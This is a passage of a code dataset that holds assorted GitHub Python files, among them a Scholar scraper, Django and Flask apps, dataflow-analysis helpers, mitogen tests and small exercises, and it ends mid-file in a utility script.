'terrorism']\n\n\n# Function to create the database table. 
Only required to run on first iteration.\ndef create_db():\n c.execute(\n '''CREATE TABLE articles(title TEXT, author TEXT, description TEXT, url TEXT)''')\n\n\n# Function to scrape multiple pages\ndef scrape():\n for term in terms:\n URL = 'https://scholar.google.com/scholar?start=00&q=' + \\\n (term)+'&hl=en&as_sdt=0,1'\n # Scrape the first 2 pages of the key term (first 20 articles)\n for page in range(0, 2):\n new_url = URL[:41] + str(page) + URL[42:]\n time.sleep((30-5)*np.random.random()+5)\n html = requests.get(new_url, headers=headers).text\n soup = BeautifulSoup(html, 'html.parser')\n\n # Parsing through the data and grabbing what we need to populate our DB\n for result in soup.select('.gs_ri'):\n title = result.select_one('.gs_rt').text\n author = result.select_one('.gs_a').text\n description = result.select_one('.gs_rs').text\n url = result.select_one('.gs_rt a')['href']\n try:\n all_article_versions = result.select_one(\n 'a~ a+ .gs_nph')['href']\n except:\n all_article_versions = None\n c.execute('''INSERT INTO articles VALUES(?,?,?,?)''',\n (title, author, description, url))\n print('Finished scraping page ' + str(page) + ' of term: ' + term)\n\n\ncreate_db() # Comment out this line once you've created the database file\n# scrape()\nconn.commit()\nconn.close()\n","repo_name":"joxhkim/REACHus","sub_path":"scraper/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43401475340","text":"import sys\nimport os.path\nimport os\nfrom src import controller\n\nif len(sys.argv) > 1:\n try:\n groups, status, outdir = controller.run(sys.argv[1])\n if not status:\n print('Could not completely meet all rules')\n except Exception as e:\n print(e)\nelse:\n # import gui stuff only if we are going to use it\n from Tkinter import *\n from tkFileDialog import askopenfilename\n from tkMessageBox import showerror, showinfo\n\n path = askopenfilename()\n d, f = os.path.split(path)\n os.chdir(d)\n try:\n groups, status, outdir = controller.run(f)\n except Exception as e:\n showerror('GroupEng Error', '{0}'.format(e))\n\n if status:\n showinfo(\"GroupEng\", \"GroupEng Run Succesful\\n Output in: {0}\".format(outdir))\n else:\n showinfo(\"GroupEng\", \"GroupEng Ran Correctly but not all rules could be met\\n\"\n \"Output in: {0}\".format(outdir))\n \n","repo_name":"ehudhala/GroupEng","sub_path":"GroupEng.py","file_name":"GroupEng.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21817340453","text":"#!/usr/bin/env python\n\nfrom .global_config import default_arg_names, default_stack_arg_names\n\n\ndef predict_parameter_pointer_in_backward(callsite):\n \"\"\"\n In backward, the callsite's backward exprs should predict whether contain parameter ptrs.\n (2147483627) (ptr) (B-0)>\n \"\"\"\n parameter_ptrs = []\n context_info = {}\n backward_exprs = callsite.backward_exprs\n # live_defs = callsite.live_defs\n\n for pre_block in callsite.predecessors:\n # print(\"uuu- pre: %s\" % (pre_block))\n live_defs = pre_block.live_defs\n for arg in default_arg_names:\n get_context_alias_info(arg, context_info, live_defs)\n # print(\"callsite: %s has context: \\n%s\" % (callsite, context_info))\n\n for trace_expr in backward_exprs:\n trace_sims = trace_expr.expr.sims\n if len(trace_expr.expr.sim_actions) == 0:\n continue\n\n for var, sim in trace_sims.items():\n for alias, info in 
context_info.items():\n                if type(alias) is tuple and alias[1] == var:\n                    arg, arg_type = info\n                    if arg_type is None:\n                        arg_type = find_stack_var_type(var, trace_expr)\n\n                    if arg_type == 'ptr' and arg not in parameter_ptrs:\n                        parameter_ptrs.append(arg)\n\n                elif alias == var:\n                    arg, arg_type = context_info[var]\n                    if arg_type is None:\n                        arg_type = sim.var_type\n\n                    if arg_type == 'ptr' and arg not in parameter_ptrs:\n                        parameter_ptrs.append(arg)\n\n    # print(\"Get parameter_ptrs: %s\" % (parameter_ptrs))\n    return parameter_ptrs\n\ndef find_stack_var_type(addr, trace_expr):\n    \"\"\"\n    Find a stack variable's type by the sim_actions, e.g., load(stack_addr)\n    \"\"\"\n    sim_actions = trace_expr.expr.sim_actions\n    for i, sim_action in sim_actions.items():\n        action_data = sim_action.action_data\n        # print(sim_action)\n        if action_data.op == 'Load' and action_data.args[0].op == 'BVV' and action_data.args[0].args[0] == addr:\n            return sim_action.var_type\n\ndef get_context_alias_info(arg, context_info, live_defs):\n    \"\"\"\n    \"\"\"\n    if arg not in live_defs:\n        return\n    arg_at = live_defs[arg]\n    # print(\"context-%s %s\" % (arg, arg_at))\n    arg_alias = arg_at.src_alias if type(arg_at.src_alias) is str else arg_at.src\n    if type(arg_alias) is str:\n        if 't' in arg_alias and arg_alias in live_defs:\n            arg_alias = get_stack_load_addr(arg_alias, live_defs)\n        if arg_alias:\n            context_info[arg_alias] = (arg, arg_at.var_type)\n\n    if type(arg_at.value) is int and arg_at.src_type == 'S':\n        context_info[arg_at.value] = (arg, 'ptr')\n\ndef get_stack_load_addr(tmp, live_defs):\n    \"\"\"\n    For a 'txx = Load(stack_addr)', return the loaded stack pointer.\n    \"\"\"\n    tmp_at = live_defs[tmp]\n    if tmp_at.action_type == 'wl' and tmp_at.addr_type == 'S' and type(tmp_at.addr_value) is int:\n        # print(\"Stack-load-addr %x\" % (tmp_at.addr_value))\n        return ('*', tmp_at.addr_value)\n","repo_name":"kuc001/EmTaint","sub_path":"dataflow/call_context.py","file_name":"call_context.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"5"}
{"seq_id":"11689382853","text":"class Evaluator:\n    @staticmethod\n    def zip_evaluate(coeffs: list, words: list) -> float:\n        if not isinstance(words, list) or not isinstance(coeffs, list):\n            return -1\n        if len(words) != len(coeffs):\n            return -1\n        if len(words) == 0:\n            return -1\n        result = 0\n        for word, coeff in zip(words, coeffs):\n            if not isinstance(word, str) or not isinstance(coeff, float):\n                print('ERROR')\n                return -1\n            result += (len(word) * coeff)\n        return result\n\n    @staticmethod\n    def enumerate_evaluate(coeffs: list, words: list) -> float:\n        if not isinstance(words, list) or not isinstance(coeffs, list):\n            return -1\n        if len(words) != len(coeffs):\n            return -1\n        if len(words) == 0:\n            return -1\n        result = 0\n        for i, word in enumerate(words):\n            if not isinstance(word, str) or not isinstance(coeffs[i], float):\n                print('ERROR')\n                return -1\n            result += (len(word) * coeffs[i])\n        return result\n\n\nif __name__ == '__main__':\n    words = [\"Le\", \"Lorem\", \"Ipsum\", \"est\", \"simple\"]\n    coefs = [1.0, 2.0, 1.0, 4.0, 0.5]\n    print(Evaluator.zip_evaluate(coefs, words))\n    words = [\"Le\", \"Lorem\", \"Ipsum\", \"n’\", \"est\", \"pas\", \"simple\"]\n    coefs = [0.0, -1.0, 1.0, -12.0, 0.0, 42.42]\n    print(Evaluator.enumerate_evaluate(coefs, words))
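\n# Editor's note (added): for the first words/coefs pair the weighted sum of word lengths is 2*1.0 + 5*2.0 + 5*1.0 + 3*4.0 + 6*0.5 = 32.0, so the first call should print 32.0; the second pair has 7 words but 6 coefficients, so the second call should print -1.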
","repo_name":"Glagan/42-python-module","sub_path":"module01/ex04/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"14499230241","text":"from . import views\nfrom django.urls import path\n\napp_name = 'port_db'\nurlpatterns = [\n    path('', views.home, name='home'),\n    path('hobbies/', views.hobbies, name='hobbies'),\n    path('portfolio/', views.portfolio, name='portfolio'),\n    path('contact/', views.contact, name='contact'),\n    path('hobbies/<int:pk>/', views.hobby_detail, name='hobby_detail'),\n    path('portfolio/<int:pk>/', views.project_detail, name='portfolio_detail'),\n    path('portfolio/add/', views.addProject, name='addProject'),\n    path('portfolio/update/<int:pk>/', views.updateProject, name='updateProject'),\n    path('portfolio/delete/<int:pk>/', views.deleteProject, name='deleteProject'),\n]","repo_name":"tcgregory-weber/challenge4","sub_path":"PortfolioDatabase/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"42280197166","text":"from flask import Flask,jsonify,request\nfrom datetime import datetime\n\n# Location of static files; adjust as needed. Here we use the default path: './static/'\napi = Flask(__name__, static_url_path='')\n\n\nfrom apps.kindle import kindle\nfrom utils.domain import allow_cross_domain\n\nfrom settings.db import _db\nimport random\n\n\n@api.route('/kindle', methods=['GET'])\ndef rrr():\n    f = _db['k2'].find({},{'_id':0})\n    fl = f.count()\n    nu = random.randint(0, fl - 1)\n    last = f[nu]\n    return jsonify(last)\n\n\n@api.route('/zhihu', methods=['GET'])\ndef zhihu():\n    f = _db['zhihu_collection'].find({},{'_id':0})\n    fl = f.count()\n    nu = random.randint(0, fl - 1)\n    last = f[nu]\n    return jsonify(last)\n\n\n\n\n# Fetch a specified word\n@api.route('/create', methods=['POST','OPTIONS'])\n@allow_cross_domain\ndef create():\n    print(request.json)\n    data = {}\n    # if request.json!=None and request.json['secret']=='sj':\n    if request.json!=None:\n        data['read_time'] = datetime.now()\n        data['tag'] = request.json['tag']\n        data['content'] = request.json['content']\n        # data['find_url'] = request.json['url']\n        _db['k2'].insert(data)\n        print(data)\n    return jsonify({'status': 200})\n\n\n\napi.register_blueprint(kindle,url_prefix='/kindle')\n\n\nif __name__ == '__main__':\n    # api.run(debug=True,host='0.0.0.0',)\n    
api.run(host='0.0.0.0',port=8333)\n","repo_name":"persontianshuang/kkk1","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41250621276","text":"#!/usr/bin/env python3\n#\n# @Author: Josh Erb \n# @Date: 10-Apr-2017 12:04\n# @Email: josh.erb@excella.com\n# @Last modified by: josh.erb\n# @Last modified time: 10-Apr-2017 13:04\n\n\n#####\n# IMPORTS\n#####\n\nimport os\nimport requests\nfrom urllib import parse\nfrom datetime import datetime as dt\n\n#####\n# CONSTANTS\n#####\n\napi_url = 'http://source.unsplash.com/random/2560x1600'\nout_path = os.path.join(os.path.expanduser('~'), 'pictures/backgrounds')\n\n#####\n# FUNCTIONS\n#####\n\n\ndef fetch(url=api_url):\n \"\"\"\n Takes a url string as an argument and performs a request for a\n random photo on the Unsplash API.\n \"\"\"\n # Query the Unsplash API for a random background image\n query = requests.get(url)\n\n # Here in case I run into trouble while running the code\n assert query.status_code == 200, 'Unsuccessful connection to the Unsplash API.'\n\n # hand the query back\n return query\n\n\ndef save_me(response, path=out_path):\n \"\"\"\n Save the returned value of fetch() as a .jpg file in the specified output\n path.\n \"\"\"\n # set the name as the day the photo was pulled\n fn = dt.utcnow().strftime('%Y-%b-%d') + '.jpg'\n\n # save the file to the designated backgrounds folder\n with open(os.path.join(path, fn), 'wb') as f:\n f.write(response.content)\n\n\ndef main():\n \"\"\"\n Main execution function for foto_fetcher.py.\n \"\"\"\n img = fetch()\n save_me(img)\n\n#####\n# EXECUTION\n#####\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"riastrad/Daily-Background","sub_path":"foto_fetcher.py","file_name":"foto_fetcher.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35131199558","text":"from django.shortcuts import render\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import get_object_or_404, render\nfrom django.views import generic\nfrom .models import User\nfrom .models import Tweets , likes , comments,follow\n\ndef Home(request, ids):\n o = User.objects.get(id=ids)\n return render(request, 'tweets/home.html',{'o' : o})\n\n\ndef posttweet(request, ids):\n o = User.objects.get(id=ids)\n return render(request, 'tweets/posttweet.html',{'o' : o})\n\ndef savetweet(request , ids):\n\tif request.method == 'POST':\n\t\to = User.objects.get(id=ids)\t\n\t\tmy_model = Tweets()\t\n\t\tstring = request.POST['tweettext']\n\t\tmy_model.tweet=string\n\t\tmy_model.tweeted_by=o\n\t\tmy_model.save()\n\n\ndef finduser(request , ids):\n\to = User.objects.get(id=ids)\n\treturn render(request, 'tweets/finduser.html',{'o' : o})\n\n\n\ndef fonduser(request , ids):\n\tif request.method == 'POST':\n\t\to = User.objects.get(id=ids)\t\n\t\tstring = request.POST['find_user']\n\t\ttry:\t\t\n\t\t\tfinduser = User.objects.get(name=string)\n\t\t\to={'o':o , 'a':finduser}\n\t\t\treturn render(request, 'tweets/founduserdetails.html' , o)\n\t\texcept User.DoesNotExist:\t\n\t\t\tpass\n\n\ndef followuser(request , ids, aids):\n\tif request.method == 'POST':\n\t\to = User.objects.get(id=ids)\n\t\to2 = User.objects.get(id=aids)\t\n\t\tdb =follow()\n\t\tdb.user=o\n\t\tdb.followed_by=o2\n\t\tdb.save()\n\n\ndef viewtweets (request , ids):\n\to = 
User.objects.get(id=ids)\n\to2 = follow.objects.filter(user=ids)\n\ta=[]\n\tfor itr in o2 :\n\t\ta.append(User.objects.get(id=itr.followed_by.id))\n\to = {'o' : o ,'a': a}\n\treturn render(request, 'tweets/viewtweets.html', o )\n\n\n\ndef liketweet(request , ids, aids):\n\tobj = User.objects.get(id=ids)\n\to=likes()\n\to.liked_by=obj\n\tobj1 = Tweets.objects.get(tweet=aids)\n\to.tweet = obj1\n\ttry:\t\n\t\tif likes.objects.get(liked_by=o.liked_by ,tweet = o.tweet) :\n\t\t\treturn render(request, 'tweets/likeunsuccesfull.html')\n\t\t\t\t\n\texcept:\n\t\to.save()\n\t\treturn render(request, 'tweets/likesuccesfull.html' )\n\ndef commenttweet(request , ids, aids):\n\tif request.method == 'POST':\t\n\t\tobj = User.objects.get(id=ids)\n\t\to=comments()\n\t\to.commented_by=obj\n\t\tobj = Tweets.objects.get(tweet=aids)\n\t\to.tweet = obj\n\t\tstring = request.POST['comment']\n\t\to.comment=string\n\t\to.save()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"hamzatalat/Twitter-django","sub_path":"tweets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7128786352","text":"import shutil\nfrom multiprocessing import Queue\nfrom time import sleep\n\nimport psutil\n\nfrom onlineasr.online_speech_recognition import OnlineSpeechRecognizer\nfrom utils.logger import Logger\nfrom zamia.decode_mic import *\n\n\nclass SpeechEngine:\n def __init__(self, queue: Queue):\n from config import config\n process = psutil.Process(os.getpid())\n start = process.memory_info()[0]\n if config.ASR == 1:\n self.sr = SpeechRecognizer()\n else:\n self.sr = OnlineSpeechRecognizer()\n usage = process.memory_info()[0] - start\n print(\"[Memory Usage | Speech Recognition]\", usage >> 20)\n self.__queue = queue\n self.__logger_speech = Logger(\"speech\")\n self.__logger_text = Logger(\"text\")\n\n def start_recognition(self):\n from text_classification import TextClassificationEngine\n from config import config\n te = TextClassificationEngine()\n if config.TC == 1:\n get_sentiment = te.get_sentiment\n else:\n get_sentiment = te.get_svm_sentiment\n\n directory = \"/home/darshanakg/speech_commands/new_describe\"\n for file_name in os.listdir(directory):\n source = os.path.join(directory, file_name)\n destination = \"/home/darshanakg/Projects/SensorFusion/zamia/aspire_new/data/test/utt1.wav\"\n if os.path.exists(destination):\n os.remove(destination)\n shutil.copyfile(source, destination)\n self.__logger_speech.start()\n text = self.sr.recognize_speech()\n text = text.strip().lower()\n self.__logger_speech.checkpoint(\"%s,%s\" % (file_name, text))\n self.__logger_text.start()\n sentiment = get_sentiment(text)\n if sentiment:\n self.__queue.put(sentiment)\n self.__logger_text.checkpoint(\"%s,%s,%s\" % (file_name, text, sentiment[\"operation\"]))\n print(\"[Speech] Detected speech: %s [%s]\" % (text, sentiment[\"operation\"]))\n else:\n print(\"[Speech] Detected speech: %s [Invalid Command]\" % text)\n sleep(10)\n self.__logger_speech.save()\n self.__logger_speech.close()\n self.__logger_text.save()\n self.__logger_text.close()\n print(\"IT'S OVER\")\n\n\nif __name__ == \"__main__\":\n queue = Queue()\n se = SpeechEngine(queue)\n 
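# (added, hypothetical usage) start_recognition() blocks this thread; a consumer\n    # could drain the queue concurrently, e.g. (assuming threading is imported):\n    #   threading.Thread(target=lambda: print(queue.get()), daemon=True).start()\n    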
se.start_recognition()\n","repo_name":"uom-cse-realitix/SensorFusion","sub_path":"speech_recognition_demo.py","file_name":"speech_recognition_demo.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28499289692","text":"import random\n\nplay = True\n\nplayerName = input('Player Name: ')\n\nprint(f\"Hi {playerName} let's play a guessing game\")\n\nwhile play:\n easy = random.randint(1,10)\n medium = random.randint(1,20)\n hard = random.randint(1,50)\n\n print(\"Enter the level you wish to play\" \"\\nType 'e' for easy, 'm' for medium, 'h' for hard\")\n\n level_selection = True\n while level_selection:\n level = input()\n if level == 'e':\n print(\"\\nAwesome level EASY begins \")\n level_selection = not True\n break\n if level == 'm':\n print(\"\\nAwesome level MEDIUM begins\")\n level_selection = not True\n break\n if level == 'h':\n print(\"\\n Awesome level HARD begins\")\n level_selection = not True\n break\n else:\n print(\"Invalid level selection. Enter either 'e', 'm' or 'h' \")\n break\n\n if level == 'e':\n print(\"You have only 6\\n guesses to guess a number between 1-10 \")\n guess_left = 6\n while guess_left != 0:\n try1 = int(input(\"Enter your guess: \\n\"))\n if try1 == easy:\n print(\"You got it Right!!!!\")\n break\n else:\n\n print(\"That was wrong!!!\")\n guess_left -= 1\n print('You now have ' +str(guess_left)+ ' guesses left')\n\n if guess_left == 1:\n print('just 1 guess to go')\n\n if guess_left == 0:\n print('Game Over!!')\n\n\n if level == 'm':\n print(\"You've got only 4\\n guesses to guess a number between 1-20\")\n guess_left = 4\n while guess_left != 0:\n try1 = int(input(\"Enter your guess: \\n\"))\n if try1 == medium:\n print(\"You got it Right!!!\")\n break\n else:\n print(\"That was wrong\")\n guess_left -=1\n print(\"You've got \" +str(guess_left)+ \"guesses left\")\n\n if guess_left == 1:\n print('Just 1 guess to go')\n\n if guess_left == 0:\n print('Game Over!!')\n\n if level == 'h':\n print(\"You only have 2\\n guesses to guess a number between 1-50 \")\n guess_left = 2\n while guess_left != 0:\n try1 = int(input(\"Enter your Guess: \\n \"))\n if try1 == hard:\n print(\"That is Right!!!\")\n break\n else:\n print(\"That was wrong\")\n guess_left -= 1\n print(\"You've got \" +str(guess_left)+ \" guesses left\")\n\n if guess_left == 1:\n print(\"Just 1 guess to go\")\n\n if guess_left == 0:\n print(\"Game Over\")\n\n play_again = True\n while play_again:\n again = input(\"Would you like to play again? y(Yes)or n(No) \").lower()\n if again == 'no':\n print(\"Thanks for playing\")\n play_again = not True\n play = not True\n elif again == 'yes':\n print(\"Let's play again then \")\n play_again = not True\n play = True\n\n else:\n print(\"please enter yes or no.\")\n input()\n play_again = not True\n play = not True\n\n\n\n\n","repo_name":"Chubi-D/python_task_3","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6991141838","text":"\"\"\"\n78. 
Subsets\nYou are given an integer array nums whose elements are all distinct. Return all possible subsets of the array (the power set).\n\nThe solution set must not contain duplicate subsets. You may return the subsets in any order.\n"""\nfrom typing import List\n\n\nclass Solution:\n    def subsets(self, nums: List[int]) -> List[List[int]]:\n        nums.sort()\n        results = []\n\n        def backtrack(nums, tmp):\n            results.append(tmp)\n            for i in range(len(nums)):\n                backtrack(nums[i + 1:], tmp + [nums[i]])\n\n        backtrack(nums, [])\n        return results\n","repo_name":"jonbenzhang/python-","sub_path":"08leetcode/1_100/78_子集.py","file_name":"78_子集.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20293334312","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = \"ipetrash\"\n\n\nimport time\nfrom threading import Thread\n\n\ndef thread(my_func):\n    def wrapper(*args, **kwargs):\n        my_thread = Thread(target=my_func, args=args, kwargs=kwargs)\n        my_thread.start()\n\n    return wrapper\n\n\nif __name__ == \"__main__\":\n    @thread\n    def _print_and_sleep(timeout=2):\n        print(\"start. print_and_sleep\")\n\n        time.sleep(timeout)\n        print(\"finish. print_and_sleep\")\n\n    @thread\n    def _print_loop(name, max_num=10):\n        print(\"start. _print_loop\")\n\n        i = 0\n\n        while True:\n            print(name, i)\n            time.sleep(1)\n\n            i += 1\n            if i == max_num:\n                break\n\n        print(\"finish. _print_loop\")\n\n    _print_and_sleep()\n    _print_and_sleep(4)\n    _print_and_sleep()\n    _print_loop(\" loop\")\n","repo_name":"gil9red/SimplePyScripts","sub_path":"Decorators__examples/thread.py","file_name":"thread.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"5"} +{"seq_id":"15275313678","text":"import sys\nimport threading\nimport unittest\n\nimport mitogen.core\nimport testlib\n\n\ndef yield_stuff_then_die(sender):\n    for x in range(5):\n        sender.send(x)\n    sender.close()\n    return 10\n\n\nclass ConstructorTest(testlib.RouterMixin, testlib.TestCase):\n    def test_handle(self):\n        recv = mitogen.core.Receiver(self.router)\n        self.assertIsInstance(recv.handle, int)\n        self.assertGreater(recv.handle, 100)\n        self.router.route(\n            mitogen.core.Message.pickled(\n                'hi',\n                dst_id=0,\n                handle=recv.handle,\n            )\n        )\n        self.assertEqual('hi', recv.get().unpickle())\n\n\nclass IterationTest(testlib.RouterMixin, testlib.TestCase):\n    def test_dead_stops_iteration(self):\n        recv = mitogen.core.Receiver(self.router)\n        fork = self.router.local()\n        ret = fork.call_async(yield_stuff_then_die, recv.to_sender())\n        self.assertEqual(list(range(5)), list(m.unpickle() for m in recv))\n        self.assertEqual(10, ret.get().unpickle())\n\n    def iter_and_put(self, recv, latch):\n        try:\n            for msg in recv:\n                latch.put(msg)\n        except Exception:\n            latch.put(sys.exc_info()[1])\n\n    def test_close_stops_iteration(self):\n        recv = mitogen.core.Receiver(self.router)\n        latch = mitogen.core.Latch()\n        t = threading.Thread(\n            target=self.iter_and_put,\n            args=(recv, latch),\n        )\n        t.start()\n        t.join(0.1)\n        recv.close()\n        t.join()\n        self.assertTrue(latch.empty())\n\n\n\nclass CloseTest(testlib.RouterMixin, testlib.TestCase):\n    def wait(self, latch, wait_recv):\n        try:\n            latch.put(wait_recv.get())\n        except Exception:\n            latch.put(sys.exc_info()[1])\n\n    def test_closes_one(self):\n        latch = mitogen.core.Latch()\n        wait_recv = mitogen.core.Receiver(self.router)\n        t = threading.Thread(target=lambda: self.wait(latch, wait_recv))\n        t.start()\n        wait_recv.close()\n        def throw():\n            raise latch.get()\n        t.join()\n        e = self.assertRaises(mitogen.core.ChannelError, throw)\n        
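# (added note) Receiver.closed_msg is the text attached to the ChannelError\n        # raised when close() interrupts a blocked get(); it is asserted just below.\n        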
self.assertEqual(e.args[0], mitogen.core.Receiver.closed_msg)\n\n def test_closes_all(self):\n latch = mitogen.core.Latch()\n wait_recv = mitogen.core.Receiver(self.router)\n ts = [\n threading.Thread(target=lambda: self.wait(latch, wait_recv))\n for x in range(5)\n ]\n for t in ts:\n t.start()\n wait_recv.close()\n def throw():\n raise latch.get()\n for x in range(5):\n e = self.assertRaises(mitogen.core.ChannelError, throw)\n self.assertEqual(e.args[0], mitogen.core.Receiver.closed_msg)\n for t in ts:\n t.join()\n\n\nclass OnReceiveTest(testlib.RouterMixin, testlib.TestCase):\n # Verify behaviour of _on_receive dead message handling. A dead message\n # should unregister the receiver and wake all threads.\n\n def wait(self, latch, wait_recv):\n try:\n latch.put(wait_recv.get())\n except Exception:\n latch.put(sys.exc_info()[1])\n\n def test_sender_closes_one_thread(self):\n latch = mitogen.core.Latch()\n wait_recv = mitogen.core.Receiver(self.router)\n t = threading.Thread(target=lambda: self.wait(latch, wait_recv))\n t.start()\n sender = wait_recv.to_sender()\n sender.close()\n def throw():\n raise latch.get()\n t.join()\n e = self.assertRaises(mitogen.core.ChannelError, throw)\n self.assertEqual(e.args[0], sender.explicit_close_msg)\n\n @unittest.skip(reason=(\n 'Unclear if a asingle dead message received from remote should '\n 'cause all threads to wake up.'\n ))\n def test_sender_closes_all_threads(self):\n latch = mitogen.core.Latch()\n wait_recv = mitogen.core.Receiver(self.router)\n ts = [\n threading.Thread(target=lambda: self.wait(latch, wait_recv))\n for x in range(5)\n ]\n for t in ts:\n t.start()\n sender = wait_recv.to_sender()\n sender.close()\n def throw():\n raise latch.get()\n for x in range(5):\n e = self.assertRaises(mitogen.core.ChannelError, throw)\n self.assertEqual(e.args[0], mitogen.core.Receiver.closed_msg)\n for t in ts:\n t.join()\n\n # TODO: what happens to a Select subscribed to the receiver in this case?\n\n\nclass ToSenderTest(testlib.RouterMixin, testlib.TestCase):\n klass = mitogen.core.Receiver\n\n def test_returned_context(self):\n myself = self.router.myself()\n recv = self.klass(self.router)\n self.assertEqual(myself, recv.to_sender().context)\n","repo_name":"mitogen-hq/mitogen","sub_path":"tests/receiver_test.py","file_name":"receiver_test.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","stars":2100,"dataset":"github-code","pt":"29"} +{"seq_id":"10076267192","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cluster', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='cluster',\n name='persistent',\n field=models.IntegerField(null=True, blank=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"ZUNbado/lbmanager","sub_path":"apps/cluster/migrations/0002_auto_20150216_1623.py","file_name":"0002_auto_20150216_1623.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"27786342186","text":"import sys\ninput = sys.stdin.readline\nN = int(input())\narr = list(map(int, input().split()))\narr.insert(0, 0)\ndy = [0] * (N+1)\ndy[1] = 1\nres = 0\nfor i in range(2, N+1):\n maximum = 0\n for j in range(i-1, 0, -1):\n if arr[j] < arr[i] and dy[j] > maximum:\n maximum = dy[j]\n dy[i] = maximum+1\n if dy[i] > res:\n res = dy[i]\nif N == 1:\n 
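# a single element is itself an increasing subsequence of length 1\n    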
print(1)\nelse:\n    print(res)","repo_name":"Hin1209/PS","sub_path":"JJUN/WEEK05/BOJ11503가장긴증가하는부분수열_JUN.py","file_name":"BOJ11503가장긴증가하는부분수열_JUN.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72118358477","text":"lista = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\ndados = []\nlinha2 = []\ncoluna3 = []\nfor linha in range(0, 3):\n    for coluna in range(0, 3):\n        lista[linha][coluna] = int(input(f'Enter a number for position [{linha},{coluna}] '))\nfor linha in range(0, 3):\n    for coluna in range(0, 3):\n        print(f'[{lista[linha][coluna]:^5}]', end='')\n    print()\nfor sub in lista:\n    for num in sub:\n        dados.append(num)\ns = 0\nfor c in dados:\n    if c % 2 == 0:\n        s = s + c\nfor l2 in lista[1]:\n    linha2.append(l2)\ns3 = 0\nfor i in range(0, 3):\n    coluna3.append(lista[i][2])\n    s3 = s3 + lista[i][2]\n\nprint(f'The sum of the even values is {s}.')\nprint(f'The sum of the values in the third column is {s3}.')\nprint(f'The largest value in the second row is {max(linha2)}.')\n","repo_name":"BrunoIaneczek/Estudo-na-linguagem-Python","sub_path":"Python_exercicios/Exercício_87_Mais_sobre_matriz_em_python.py","file_name":"Exercício_87_Mais_sobre_matriz_em_python.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"19542971683","text":"from abc import ABC, abstractmethod\n\nfrom PIL import Image\nfrom qdrant_client.grpc import ScoredPoint\n\nfrom common.consts import PROJECT_PATH\nfrom metrics.consts import MetricCollections\n\n\nclass EnvFunctionHandler(ABC):\n    \"\"\"\n    Base class for listing shared methods.\n    \"\"\"\n\n    local_data_dir = PROJECT_PATH / \"data\"\n    local_models_dir = local_data_dir / \"models\"\n    local_metric_datasets_dir = local_data_dir / \"metric_datasets\"\n\n    @abstractmethod\n    def get_best_score_imgs(self, results: list[ScoredPoint]) -> list[Image.Image]:\n        \"\"\"\n        Handler for returning images with the highest similarity scores from env storage.\n        Additionally, filenames are returned as future captions in front-end module.\n        \"\"\"\n\n    @abstractmethod\n    def get_random_images_from_collection(\n        self, collection_name: MetricCollections, k: int\n    ) -> tuple[list[str], list[Image.Image]]:\n        \"\"\"\n        Pulls a random set of images from a selected collection in env storage.\n        Used for image input suggestion in front-end component.\n        Additionally, filenames are returned as captions.\n        \"\"\"\n\n    @abstractmethod\n    def get_meta_json(\n        self, collection_name: MetricCollections\n    ) -> dict[str, list[int] | str]:\n        \"\"\"\n        Get meta.json dictionary created during model training from env storage.\n        \"\"\"\n","repo_name":"stxnext/visual-similarity-search","sub_path":"common/handler_env.py","file_name":"handler_env.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"29"} +{"seq_id":"19638474676","text":"#!/usr/bin/python3\n\"\"\" Quick & dirty utility to check parsing of various server JSON files\n\"\"\"\n\nimport sys\nimport json\nfrom pykumo import KumoCloudAccount, PyKumoStation\n\ndef main():\n    \"\"\" Entry point\n    \"\"\"\n    filename = sys.argv[1]\n    file = 